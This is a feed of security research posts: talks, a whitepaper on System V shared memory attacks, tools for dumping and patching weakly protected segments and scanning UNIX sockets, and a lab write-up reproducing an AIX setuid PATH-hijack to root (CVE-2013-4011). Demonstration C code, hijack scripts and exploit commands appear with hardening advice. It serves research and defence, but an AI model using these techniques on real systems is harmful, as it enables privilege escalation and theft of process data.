Portcullis Labs » imisslsd: Research and Development (https://labs.portcullis.co.uk)

44CON uncovered
https://labs.portcullis.co.uk/presentations/44con-uncovered/
Sat, 21 Jun 2014 12:01:45 +0000

Presentation on system level vulnerabilities (as given at BT’s SnoopCon 2014).

This talk references previous presentations including:

  • “I miss LSD”
  • “Big Game Hunting: Simple techniques for bug hunting on big iron UNIX”
  • “Breaking the Links: Exploiting the Linker”

Attachment: 44CU.pdf (June 20, 2014, 247.5 KiB, MD5 22527f212e79dffdb8a91c56b878130f)

The post 44CON uncovered appeared first on Portcullis Labs.

Memory Squatting: Attacks On System V Shared Memory
https://labs.portcullis.co.uk/whitepapers/memory-squatting-attacks-on-system-v-shared-memory/
Wed, 13 Nov 2013 03:26:00 +0000
Rather than representing a definitive guide, this document represents a review of the specific security issues identified during Portcullis Computer Security Ltd’s recent research into System V shared memory segments and their usage.

What follows should, however, provide a high-level summary of issues, impacts and methods of remediation in cases where System V shared memory segments are used in an insecure fashion. This paper was released as part of my presentation at 44CON 2013 entitled “I miss LSD”.

Attachment: MSAOSVSM.pdf (November 13, 2013, 569.3 KiB, MD5 2511c7c09b51f39b74f37ed5e79fe1b5)

The post Memory Squatting: Attacks On System V Shared Memory appeared first on Portcullis Labs.

smaSHeM
https://labs.portcullis.co.uk/tools/smashem/
Tue, 12 Nov 2013 22:24:29 +0000
smaSHeM is a System V shared memory segment manipulator.

Key features

  • Allows dumping of segments in a variety of formats including JPEGs
  • Allows patching of segments

Overview

System V shared memory segments created with shmget() are assigned an owner, a group and a set of permissions intended to limit access to the segment to designated processes only. The owner of a shared memory segment can change the ownership and permissions on a segment after its creation using shmctl(). Any subsequent processes that wish to attach to the segment can only do so if they have the appropriate permissions. The permission check happens at shmat() time: once attached, a process can read (and, if it attached read-write, write) the segment for as long as the mapping lives, and tightening the mode afterwards with shmctl() does not revoke attachments that already exist.

smaSHeM takes advantage of applications that set weak permissions on such segments, allowing an attacker to dump or patch their contents. As discussed in my presentation at 44CON 2013 entitled “I miss LSD”, in the case of many X11 applications it is possible to extract pixmaps of previously rendered GUI artifacts. When compiled with QtCore linking enabled, smaSHeM aids in that process by brute forcing potentially valid dimensions for the raw pixmap dump.
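As an added illustration of the permission model described above (example code written for this page, not part of smaSHeM), the program below creates one segment with mode 0666 and one with 0600, reports which of them the “other” bits expose, and then dumps and patches the weak one by shmid, the same operations smaSHeM’s -d and -@/-s options perform. The segment size and contents are constructed; the shmid is whatever the kernel hands back, which is what you would otherwise read from ipcs -m. Run the dump from a second, unprivileged account to see the 0600 segment refuse the attach with EACCES.

```c
/* Added example (not smaSHeM's own code): why a System V shared memory
 * segment created with a weak mode is readable and patchable by any local
 * user, and the IPC_STAT check that exposes the weakness. Linux, POSIX C. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/types.h>

#define SEG_LEN 4096   /* constructed segment size */

/* Create a segment with the given mode bits and fill it with a constructed
 * marker string, as a weakly permissioned application would. Returns the
 * shmid (what smaSHeM takes as -i) or -1. */
static int create_segment(int mode, const char *marker)
{
    int id = shmget(IPC_PRIVATE, SEG_LEN, IPC_CREAT | mode);
    if (id < 0)
        return -1;
    char *p = shmat(id, NULL, 0);
    if (p == (char *)-1) {
        shmctl(id, IPC_RMID, NULL);
        return -1;
    }
    memset(p, 0, SEG_LEN);
    strncpy(p, marker, SEG_LEN - 1);
    shmdt(p);
    return id;
}

/* The check smaSHeM's targets fail: 1 if the "other" read or write bits are
 * set on the segment, 0 if not, -1 on error. This is the same data ipcs -m
 * shows in its perms column. */
static int world_accessible(int id)
{
    struct shmid_ds ds;
    if (shmctl(id, IPC_STAT, &ds) < 0)
        return -1;
    return (ds.shm_perm.mode & 0006) != 0;
}

/* Dump: attach read-only and copy the first n bytes out. Returns bytes
 * copied or -1; from another uid the attach fails with EACCES unless the
 * mode bits allow it. */
static ssize_t dump_segment(int id, char *out, size_t n)
{
    const char *p = shmat(id, NULL, SHM_RDONLY);
    if (p == (const char *)-1)
        return -1;
    if (n > SEG_LEN)
        n = SEG_LEN;
    memcpy(out, p, n);
    shmdt(p);
    return (ssize_t)n;
}

/* Patch: attach read-write and overwrite len bytes at off, the equivalent of
 * smaSHeM's -@ <patchoffset> -s <patchstring>. Returns 0 or -1. */
static int patch_segment(int id, size_t off, const void *data, size_t len)
{
    if (off > SEG_LEN || len > SEG_LEN - off) {
        errno = ERANGE;
        return -1;
    }
    char *p = shmat(id, NULL, 0);
    if (p == (char *)-1)
        return -1;
    memcpy(p + off, data, len);
    shmdt(p);
    return 0;
}

static int remove_segment(int id)
{
    return shmctl(id, IPC_RMID, NULL);
}

int main(void)
{
    char buf[32];
    int weak = create_segment(0666, "secret pixmap bytes");
    int safe = create_segment(0600, "secret pixmap bytes");
    if (weak < 0 || safe < 0) {
        perror("shmget/shmat");
        return 1;
    }
    printf("shmid %d mode 0666: world accessible = %d\n", weak, world_accessible(weak));
    printf("shmid %d mode 0600: world accessible = %d\n", safe, world_accessible(safe));
    dump_segment(weak, buf, sizeof buf);
    printf("before patch: %s\n", buf);
    patch_segment(weak, 0, "AAAAAA", 6);
    dump_segment(weak, buf, sizeof buf);
    printf("after patch:  %s\n", buf);
    remove_segment(weak);
    remove_segment(safe);
    return 0;
}
```

The fix on the application side is the mirror image of world_accessible(): create with 0600 (or 0660 and a dedicated group) and never widen the mode with IPC_SET, because any process that attached while the mode was weak keeps its mapping.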

Installation

$ ./configure [--with-qtcore] && make && make install

Usage

$ smaSHeM -v | -i <shmemid> -l <shmemlength> <-@ <patchoffset> -s <patchstring> | -d [-p | -c | -P | -j -x <xstart> -X <endx> -y <starty> -Y <yend>]>

Examples

Dumping the contents of a System V shared memory segment prettily:

$ smaSHeM -i 94273546 -l 459200 -d -P
0xf32fa000      00 00 00 00 1a 1a 1a 1a ........
0xf32fa008      7d 7d 7d 7d a7 a7 a7 a7 ........
0xf32fa010      af af af af af af af af ........
0xf32fa018      af af af af af af af af ........
0xf32fa020      af af af af af af af af ........
0xf32fa028      af af af af af af af af ........
0xf32fa030      af af af af af af af af ........
0xf32fa038      af af af af af af af af ........
0xf32fa040      af af af af af af af af ........
0xf32fa048      af af af af af af af af ........
0xf32fa050      af af af af af af af af ........
0xf32fa058      af af af af af af af af ........
0xf32fa060      af af af af af af af af ........
0xf32fa068      af af af af af af af af ........
0xf32fa070      af af af af af af af af ........
0xf32fa078      af af af af af af af af ........
...

Patching a segment:

$ smaSHeM -i 41779331 -l 2640 -@ 0 -s `perl -e 'print "A"x1024'`

Dumping the contents of a segment as a set of JPEGs, trying widths from 0 to 300 at a height of 30 (requires QtCore):

$ smaSHeM -i 41779331 -l 2640 -d -J -x 0 -X 300 -y 30 -Y 30

Attachment: smaSHeM-0.4.tar.gz (November 12, 2013, 210.0 KiB, MD5 2e30e4edd2faf5946b6c0e1a244fd0ba)

The post smaSHeM appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/tools/smashem/feed/ 0
I miss LSD
https://labs.portcullis.co.uk/presentations/i-miss-lsd/
Sun, 15 Sep 2013 00:48:00 +0000
Presentation on system level vulnerabilities (as given at 44CON 2013).

A wise man once said (paraphrased) “if you want to find UNIX bugs, compare and contrast the Linux and Solaris man pages”. Following on from my previous work on linker bugs and, more recently, AIX (at 44CON 2012), we’ll look at some of the more interesting areas of the POSIX specification, focusing on the various IPC mechanisms found in modern POSIX-like OSes as well as kernel land more generally. The talk included some new tools I’ve written (to be published in due course) to aid in this analysis, along with some discussion of how I uncovered potentially exploitable bugs in ~400 Debian GNU/Linux packages in a single day.

This talk was based around the recently released whitepaper “Memory Squatting: Attacks On System V Shared Memory“.

Tools referenced in this talk include:

  • smaSHeM
  • UNIXSocketScanner

Attachment: IML44C.pdf (September 29, 2013, 244.4 KiB, MD5 3dbaf8ee9413111d8284f4b1f2dc5aa1)

The post I miss LSD appeared first on Portcullis Labs.

In the lab, popping CVE-2013-4011 for AIX 7.1…
https://labs.portcullis.co.uk/blog/in-the-lab-popping-cve-2013-4011-for-aix-7-1/
Sat, 20 Jul 2013 11:01:33 +0000
Early this morning, whilst checking my mail, I saw an interesting advisory come out on one of the lists. Unlike some of the other commercial UNIX vendors, IBM make their security patches nice and accessible, so I decided to take it for a spin.

The advisory concerned AIX (one of my favourite operating systems to pwn) and related to a potential privilege escalation vulnerability in the ibstat command on AIX 6.1 and AIX 7.1, which has setUID root permissions set on it. The fact that it affects AIX 7.1 was particularly interesting because this is the most recent release.

It’s fair to say that there are a substantial number of such vulnerabilities in AIX 7.1 but my interest was piqued because it wasn’t one that we’d found.

To start with, I grabbed a copy of the efix and extracted it. You’ll notice that the tarball referenced within the advisory contains patches for all supported AIX releases which are delivered as compressed epkg files. It might not be immediately clear but these are actually just tarballs with some meta data describing the patched files. So let’s extract one and take a look:

$ tar xvf iv43580m2a.130619.epkg
x ./ecfile, 837 bytes, 2 media blocks.
...
x ./EFILE1, 47516 bytes, 93 media blocks.
x ./EFILE2, 17576 bytes, 35 media blocks.
...
$ cat ecfile
...
EFIX_FILE:
EFIX_FILE_NUM=1
...
TARGET_FILE=/usr/sbin/ibstat
...
EFIX_FILE:
EFIX_FILE_NUM=2
...
TARGET_FILE=/usr/sbin/arp.ib
...

I’ve stripped out the less interesting bits of ecfile but we can clearly see that this patches two files, /usr/sbin/ibstat and /usr/sbin/arp.ib.

So the next question is: have they actually changed? My first thought was to objdump the two binaries and compare the output. This should give us a clear idea of which libc functions are being called (and thus what the vulnerability is likely to be), however both binaries had been stripped of all symbols, which would make this a long and tedious process. So what else can we do? Well, knowing what classes of vulnerability AIX commonly falls foul of, I figured there was a reasonable likelihood that the vulnerability pertained to some kind of command injection, so I ran strings across the vulnerable binary to see if that was possible in this case:

$ strings /usr/sbin/ibstat
@(#)23 1.5 src/bos/usr/ccs/lib/libpthreads/init.c, libpth, bos53H, h2006_10B1 3/5/06 21:33:24
...
ifconfig %s
...

It certainly looked like this was a possibility, however I wanted to be sure. My next step was to run strings across the new binary and compare the output. For this, I used kompare:

[Screenshot: kompare diff of the strings output, commands that have been removed from the binary]

[Screenshot: kompare diff of the strings output, commands that have been added to the binary]

Now we can quite clearly see what has changed. In the vulnerable binary certain system commands are called without a fully qualified path. What does this mean? Well, unless ibstat sanitises the PATH environment variable before calling them, binaries such as arp will be resolved from the first matching directory in the caller’s PATH.

What this means is that we can provide our own malicious binaries in a directory we control and have them executed as root when we run ibstat (as it has setUID root permissions set).

We can prove this as follows:

$ ls -l dummybin/
total 8
lrwxrwxrwx 1 user staff 8 Jul 20 09:59 arp -> ifconfig
-rwxr-xr-x 1 user staff 49 Jul 20 10:55 ifconfig
lrwxrwxrwx 1 user staff 8 Jul 20 09:59 lsattr -> ifconfig
$ cat dummybin/ifconfig
#!/bin/sh

echo $0
echo $1
echo $2
id
sleep 1000
$ PATH=/home/user/ibstat/dummybin:/usr/bin:/etc:/usr/sbin:/usr/ucb /usr/sbin/ibstat -a lo0

===============================================================================
IB INTERFACE ARP TABLE
===============================================================================
/home/user/ibstat/dummybin/arp
-t
ib
uid=208(user) gid=1(staff) euid=0(root)

And there you have it, euid=0 in under half an hour.
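The vulnerable pattern and its fix, as an added C example (written for this page; IBM’s ibstat source is not public, so this is a reconstruction of what the strings output and the advisory describe, not their code): run_arp_vulnerable() hands an unqualified command to system(), which resolves it through whatever PATH the unprivileged caller set; run_arp_hardened() execs an absolute path (assumed to be /usr/sbin/arp) with a fixed environment and no shell. make_dummybin() builds a constructed stand-in for the dummybin/ directory above, so the program demonstrates the hijack against itself without needing a setuid binary or root.

```c
/* Added example (not IBM's ibstat code): a setuid-style program running an
 * unqualified command under the caller's PATH, next to a hardened version.
 * Linux/POSIX C. The fake "arp" is a constructed stand-in for dummybin/. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable: system() runs the string via /bin/sh, which looks "arp" up in
 * the caller's PATH. The %s is a second problem (shell metacharacters in the
 * interface name); the hardened form avoids both. */
static int run_arp_vulnerable(const char *iface)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "arp -t %s", iface);
    return system(cmd);
}

/* Hardened: absolute path (assumed), argv passed directly, and an explicit
 * minimal environment so PATH, IFS and LD_* from the caller never reach the
 * child. Returns the wait status, 127 << 8 if the exec failed. */
static int run_arp_hardened(const char *iface)
{
    char *const argv[] = { "arp", "-t", (char *)iface, NULL };
    char *const envp[] = { "PATH=/usr/bin:/usr/sbin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/usr/sbin/arp", argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return status;
}

/* Attacker side: a directory holding a fake "arp" that records that it ran
 * (constructed payload; a real one would do more than touch a file).
 * dir must hold at least 32 bytes and receives the mkdtemp() result. */
static int make_dummybin(char *dir)
{
    strcpy(dir, "/tmp/dummybin.XXXXXX");
    if (mkdtemp(dir) == NULL)
        return -1;
    char script[160];
    snprintf(script, sizeof script, "%s/arp", dir);
    FILE *f = fopen(script, "w");
    if (f == NULL)
        return -1;
    fprintf(f, "#!/bin/sh\necho \"$0 $*\" > %s/ran\n", dir);
    fclose(f);
    return chmod(script, 0755);
}

/* Put the attacker's directory first in PATH, as in the ibstat run above. */
static void prepend_path(const char *dir)
{
    const char *old = getenv("PATH");
    char newpath[4096];
    snprintf(newpath, sizeof newpath, "%s:%s", dir, old ? old : "/usr/bin");
    setenv("PATH", newpath, 1);
}

/* 1 if the fake arp was executed (marker file present), else 0. */
static int fake_arp_ran(const char *dir)
{
    char marker[160];
    struct stat st;
    snprintf(marker, sizeof marker, "%s/ran", dir);
    return stat(marker, &st) == 0;
}

static int clear_marker(const char *dir)
{
    char marker[160];
    snprintf(marker, sizeof marker, "%s/ran", dir);
    return unlink(marker);
}

int main(void)
{
    char dir[64];
    if (make_dummybin(dir) < 0) {
        perror("make_dummybin");
        return 1;
    }
    prepend_path(dir);
    run_arp_vulnerable("lo0");
    printf("vulnerable: fake arp ran = %d\n", fake_arp_ran(dir));
    clear_marker(dir);
    run_arp_hardened("lo0");
    printf("hardened:   fake arp ran = %d\n", fake_arp_ran(dir));
    return 0;
}
```

The same division applies to the ifconfig and lsattr calls the strings output shows: every child a setuid program spawns must be named by absolute path and started with an environment the program itself constructed, because everything inherited from the caller is attacker controlled.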

If you enjoyed this write up be sure to get yourself a ticket for 44CON where I will be presenting the next round of our more detailed research into modern POSIX-like OSes, including how I uncovered potentially exploitable bugs in ~400 Debian GNU/Linux packages in a single day.

The post In the lab, popping CVE-2013-4011 for AIX 7.1… appeared first on Portcullis Labs.

UNIXSocketScanner
https://labs.portcullis.co.uk/tools/unix-socket-scanner/
Fri, 26 Apr 2013 18:16:40 +0000
UNIXSocketScanner is a UNIX domain socket scanner.

Key features

  • Multi threaded
  • Supports both internal probes format and nmap probes format

Overview

UNIX domain sockets are “files” that follow the semantics of the UNIX socket interface and can be utilised by applications to offer services to other processes that are present on the same host. Whilst it can often be clear what protocols such services support from the name of the socket and/or the process that created it, this is not always the case especially if the process isn’t part of a well known F/OSS application.

UNIXSocketScanner allows the UNIX domain sockets offered by a given application to be enumerated using both nmap and internal probes to determine the likely protocol. As discussed in my presentation at 44CON 2013 entitled “I miss LSD”, the results are sometimes surprising – who knew that CUPS offered HTTP over a UNIX domain socket?
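What a probe against one of these sockets amounts to, as an added C example (written for this page, not UNIXSocketScanner’s own Perl): connect() to the path with AF_UNIX, send one probe, wait a bounded time for a reply and match it against a signature table. To keep it self-contained, start_fake_cups() forks a constructed responder that answers with a banner modelled on the CUPS reply shown below; the socket path, the three-entry signature table and the banner are all assumptions, and the real tool uses nmap’s probe file instead.

```c
/* Added example (not UNIXSocketScanner's code): connect to a UNIX domain
 * socket, send a probe, read the reply with a timeout, classify it.
 * A forked stand-in daemon (constructed) lets it run offline. Linux/POSIX C. */
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

/* One probe and the banners it can elicit (a tiny, constructed table). */
static const char HTTP_PROBE[] = "HEAD / HTTP/1.0\r\n\r\n";
static const struct { const char *name; const char *prefix; } SIGS[] = {
    { "http", "HTTP/1." },
    { "ssh",  "SSH-" },
    { "smtp", "220 " },
};

/* Match a reply against the table by prefix; "unknown" if nothing matched. */
static const char *classify(const char *resp, size_t len)
{
    for (size_t i = 0; i < sizeof SIGS / sizeof SIGS[0]; i++) {
        size_t pl = strlen(SIGS[i].prefix);
        if (len >= pl && memcmp(resp, SIGS[i].prefix, pl) == 0)
            return SIGS[i].name;
    }
    return "unknown";
}

static void fill_addr(struct sockaddr_un *sa, const char *path)
{
    memset(sa, 0, sizeof *sa);
    sa->sun_family = AF_UNIX;
    strncpy(sa->sun_path, path, sizeof sa->sun_path - 1);
}

/* Connect to path, send the probe, wait up to timeout_ms for a reply.
 * Returns the classification, or NULL if the connect failed or the service
 * stayed silent (which is itself worth reporting). */
static const char *probe_unix_socket(const char *path, int timeout_ms)
{
    struct sockaddr_un sa;
    fill_addr(&sa, path);
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0)
        return NULL;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0 ||
        write(fd, HTTP_PROBE, sizeof HTTP_PROBE - 1) < 0) {
        close(fd);
        return NULL;
    }
    struct pollfd pfd = { .fd = fd, .events = POLLIN };
    char buf[512];
    ssize_t n = -1;
    if (poll(&pfd, 1, timeout_ms) > 0)
        n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n <= 0)
        return NULL;
    return classify(buf, (size_t)n);
}

/* Constructed stand-in daemon: listen on path, answer one client with a
 * CUPS-style banner, exit. The socket is listening before fork() returns, so
 * the caller can connect immediately. Returns the child pid or -1. */
static pid_t start_fake_cups(const char *path)
{
    struct sockaddr_un sa;
    fill_addr(&sa, path);
    unlink(path);
    int lfd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (lfd < 0 || bind(lfd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(lfd, 1) < 0)
        return -1;
    pid_t pid = fork();
    if (pid != 0) {
        close(lfd);
        return pid;
    }
    alarm(5);                       /* never leave an orphaned responder */
    int cfd = accept(lfd, NULL, NULL);
    char req[256];
    if (cfd >= 0 && read(cfd, req, sizeof req) > 0) {
        const char banner[] = "HTTP/1.0 200 OK\r\nServer: CUPS/1.5\r\n\r\n";
        if (write(cfd, banner, sizeof banner - 1) < 0)
            _exit(1);
    }
    _exit(0);
}

int main(void)
{
    const char *path = "/tmp/fake-cups.sock";   /* assumed scratch path */
    pid_t pid = start_fake_cups(path);
    const char *kind = probe_unix_socket(path, 2000);
    printf("%s: %s\n", path, kind ? kind : "no answer");
    if (pid > 0)
        waitpid(pid, NULL, 0);
    unlink(path);
    return 0;
}
```

Feed it the output of find / -type s to get the same sweep the Perl tool does; sockets that connect but never answer the HTTP probe are the ones worth a second probe, since a bare connect succeeding already tells you the socket’s mode bits let your uid in.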

Installation

UNIXSocketScanner does not require installation but simply requires that the necessary dependencies have been installed.

Usage

$ find / -type s | UNIXSocketScanner.pl [-v] -x <maximumprocess> <-p <probesfilename> | -n <nmapprobesfilename>>

Examples

Scanning the CUPS UNIX domain socket:

$ echo /var/run/cups/cups.sock | UNIXSocketScanner.pl -x 2 -n /usr/share/nmap/nmap-service-probes
I: /var/run/cups/cups.sock
I: /var/run/cups/cups.sock finished
/var/run/cups/cups.sock
+ matches nmap-response-ssl
+ matches nmap-probe-SSLSessionReq
+ matches nmap-probe-GetRequest
+ matches nmap-response-ipp
+ matches nmap-probe-SSLv23SessionReq
+ matches nmap-probe-HTTPOptions

Connecting to the CUPS UNIX domain socket manually with socat:

$ socat UNIX:/var/run/cups/cups.sock STDIO
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Tue, 12 Nov 2013 22:50:04 GMT
Server: CUPS/1.5
Content-Language: en_US
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 18 Mar 2013 14:36:53 GMT
Content-Length: 3796

Scanning the Avahi UNIX domain socket:

$ echo /var/run/avahi-daemon/socket | UNIXSocketScanner.pl -x 2 -p src/probes
I: /var/run/avahi-daemon/socket
I: /var/run/avahi-daemon/socket finished
/var/run/avahi-daemon/socket
+ matches avahi-fuck

Connecting to the Avahi UNIX domain socket manually with socat:

$ socat UNIX:/var/run/avahi-daemon/socket STDIO
FUCK
+ FUCK: Go fuck yourself!

Attachment: UNIXSocketScanner-0.4 tarball (5.3 KiB, MD5 ccf7b78735ca12eb2d7195c1193979ba)

The post UNIXSocketScanner appeared first on Portcullis Labs.
